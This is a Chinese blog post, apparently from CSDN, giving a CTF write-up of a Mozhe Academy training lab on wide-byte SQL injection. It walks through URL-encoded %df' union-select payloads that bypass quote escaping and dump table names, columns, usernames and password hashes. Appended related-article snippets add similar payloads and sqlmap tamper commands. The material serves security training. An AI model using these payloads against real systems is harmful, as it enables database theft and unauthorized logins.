墨者学院之SQL注入漏洞测试(宽字节)

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: CTF题 墨者学院CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/87904193
版权

墨者学院之SQL注入漏洞测试(宽字节)

首先进入界面,找注入点,找到如下页面:
在这里插入图片描述
在这里插入图片描述
由于已知是宽字节注入,直接输入:

id=-1%df'

显示:
在这里插入图片描述
那么接下来就简单了,按照union注入即可:

判断字段:id=-1%df' order by 5%23(正常)  id=-1%df' order by 6%23(报错) 说明只有5个字段
看回显: id=-1%df' union select 1,2,3,4,5%23

在这里插入图片描述
接下来直接爆:
代码:ps:由于’被转义,表名,列名用16进制表示

id=-1%df%27%20union%20select%201,2,3,4,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23
id=-1%df%27%20union%20select%201,2,3,4,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x73746f726d67726f75705f6d656d626572)%23
id=-1%df%27%20union%20select%201,2,3,4,(select%20group_concat(name)%20from%20stormgroup_member)%23
id=-1%df%27%20union%20select%201,2,3,4,(select%20group_concat(password)%20from%20stormgroup_member)%23
id=-1%df%27%20union%20select%201,2,3,4,(select%20group_concat(status)%20from%20stormgroup_member)%23

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
把密码md5解密后得到密码,用mozhe用户名,登陆,即可得到flag

A_dmins
关注
专栏目录
墨者学院SQL注入漏洞测试字节
hehigoxqc606的博客
08-31 557
墨者学院SQL注入漏洞测试字节字节概述: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个字节字符。 思路: 注入点检测:使用and、or、‘,判断是否有注入,是否存在字节注入,是否存在http头注入以及工具检测等。 注入方式:手工注入 实验过程: 第一步:访问靶场链接 第二步:手工注入 http...
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4353
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院SQL注入漏洞测试(字节)
没事我溜达
03-17 1685
靶场地址:SQL注入漏洞测试(字节) 本章学习点为如何绕过单引号,和遇到魔术引号时该如何进行绕过。
记一次墨者学院sql手工字节注入(包含使用sqlmap字节注入)
最新发布
qq_56035503的博客
07-26 751
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
墨者SQL注入漏洞测试(字节)
wswr的博客
03-10 745
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了 思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’) 然后会发现报错,然后开始一步步注入咯 登入 找注入点通过查看页面源码(突然想到还有一种方法找注入页面,就是用F12然后去找跳转链接有没有存在注入页面,与本题无关QAQ) 然后就%df%27咯,发现注入点 order by 从1..
SQL注入漏洞测试(字节)
qq_36933272的博客
08-31 203
1.注入类型 http://219.153.49.228:40122/new_list.php?id=-1%df’报错,判断是注入 2.字段数 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 5 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 6报错,得...
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5175
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院-SQL注入漏洞测试(HTTP头注入)
JimWu的博客
09-04 1301
SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
墨者学院-SQL注入漏洞测试(报错盲注)
qq_33598708的博客
04-21 2023
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!! 然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。 开始注入: updatexml函数错误 updatexml('XML_document',...
墨者学院-----SQL注入漏洞测试(字节)
qq_43590351的博客
01-23 552
SQL注入漏洞测试(字节) python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs 字节的注入原理 ...
墨者学院-SQL注入漏洞测试(字节)
臭nana的博客
12-17 499
字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/字节注入/ 先构造payload:%df' 报错,存在字节注入 然后加:%df' oder by 5--+或者%df' order by 5%23(#) 5不报错,6报错,所以只有6个字段,联合查询 id=-1%df' union select 1,2,3,4,5%23,发现3,5回显 id=-1%d...
刷题笔记:SQL注入漏洞测试(字节)
m0_67399862的博客
06-05 520
刷题笔记:字节注入
字节注入讲解-墨者学院(SQL注入漏洞测试(字节))
T1ngSh0w的博客
09-18 5040
字节注入原理讲解+墨者学院(SQL注入漏洞测试(字节))题目详解
渗透测试-SQL注入字节注入
lza20001103的博客
04-20 9028
渗透测试-SQL注入字节注入
墨者-SQL注入漏洞测试(字节) 题解
Redredredfish的博客
12-12 616
靶场地址:https://www.mozhe.cn/bug/detail/MEJyQWEyd29tN2ErT1VocThlaUNVdz09bW96aGUmozhe ①url:http://219.153.49.228:46231/new_list.php?id=1 单引号无法闭合,猜测用了转义,尝试字节注入id=1%df' %df与转义符\组合,即url编码%df%5c,mysql会识别为一个GBK编码的汉字運,并不一定非得是%df,由于ascii字符集到%7f为止,所以只要大于%7f即可与转义符组合,例
墨者学院之SQL手工注入漏洞测试(MySQL数据库)
Chris_HackFromCN的博客
08-12 689
Do what you said,say what you can do 做你说过的,说你能做的 关于手工注入,网上已经有很多教程,本文讲解的是使用SQLmap工具来对该关卡进行注入,最后找到key。 首先打开靶场环境,可以看到用户登录的场景,里面包含账号和密码两个输入框。 对账号密码输入框进行注入测试,但都不成功,此时发现在登录按钮下面有一条维护通知,于是点进去.... 3. 如上图所示,进入到维护通知页面之后,发现其URL地址栏带有参数id,猜测该参数可能是注...
SQL 注入漏洞(十一)字节注入
不秃头的程序Yang
06-20 735
一、字节注入
墨者学院--SQL注入漏洞测试(HTTP头注入)
Routine_limon的博客
07-19 930
这道题需要使用到Burp suite这个工具。先简单的说下使用步骤: 简述下4个按钮的作用: ①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。 ②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。 ③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is ...
墨者-sql手工注入漏洞测试
04-29
其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值